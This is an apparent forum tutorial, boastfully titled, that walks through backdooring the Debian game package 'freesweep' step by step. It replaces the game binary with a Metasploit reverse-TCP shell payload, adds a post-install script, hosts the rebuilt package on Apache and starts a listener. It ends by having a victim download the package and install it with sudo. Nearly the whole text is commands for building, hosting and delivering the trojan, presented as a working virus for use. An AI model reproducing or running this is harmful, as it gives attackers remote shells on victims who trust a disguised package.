WHO SAY LINUX IS SECURE (VIRUS FOR LINUX)
TODAY I WILL SHOW U 100% WORKING VIRUS FOR LINUX.....AND HOW TO CREATE IT FROM BACKTRACK ;;;;PEOPLE WHO THINK THAT VIRUSES AND TROJANS ARE FOR WINDOWS ONLY HERE I GIVE U THE VIRUS PACKAGE FOR LINUX...
First we need to download the package that i will infect and move it to a temporary working directory. In my example, i will use the package 'freesweep',
1 seeker@bt#apt-get --download-only -install freesweep
//this command downloads the freesweep package ///
2 seeker@bt#mkdir /tmp/evil
//this command is use to create directory evil in temp directory///
3 seeker@bt# mv /var/cache/apt/archives/freesweep_0.90-2_i386.deb /tmp/evil
//this command will move the freesweep package from archives to evil directory//
4 seeker@bt# cd /tmp/evil/
5 seeker@bt:/tmp/evil#dpkg -x freesweep_0.90-2_i386.deb work
//this command will extract the package to a working directory//
6 seeker@bt:/tmp/evil#mkdir work/DEBIAN
///Now we need to create a DEBIAN directory to hold our additional added features. ///
7 seeker@bt:/tmp/evil/work/DEBIAN#vi control
//In the 'DEBIAN' directory, create a file named 'control' that contains the following data as shown in snapshot//
8 seeker@bt:/tmp/evil/work/DEBIAN#vi postinst
// this command creates a post-installation script that will execute our binary. In our 'DEBIAN', we'll create a file named 'postinst' that contains the following data as shown in snapshot//
9 seeker@bt#msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.57.78 LPORT=443 X >
/tmp/evil/work/usr/games/freesweep
////this command is used to create a malicious payload that uses a reverse shell to connect back to us named freesweep////
10 seeker@bt:/tmp/evil/work/DEBIAN#chmod 755 postinst
//in this command we make our script executable//
11 seeker@bt:/tmp/evil/work/DEBIAN#dpkg-deb --build /tmp/evil/work
//this command is used to build our new package work.deb///
12 seeker@bt:/tmp/evil#mv work.deb freesweep.deb
//change that to freesweep.deb //
13 seeker@bt:/tmp/evil#cp freesweep.deb /var /www/
//now we copy our malicious package to www directory to host it on apache///
14 seeker@bt:/tmp/evil#service apache2 start
//this command is used to start the apache service///
15 seeker@bt#msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.57.78 LPORT=443 E
//now we will set up the Metasploit multi/handler to receive the incoming connection.//
16 ///in this step we convice our UBUNTU victim to download the package (game) and install that package .////
victim@ubuntu:~$ wget http://192.168.57.78/freesweep.deb victim@ubuntu:~$ sudo dpkg -i freesweep.deb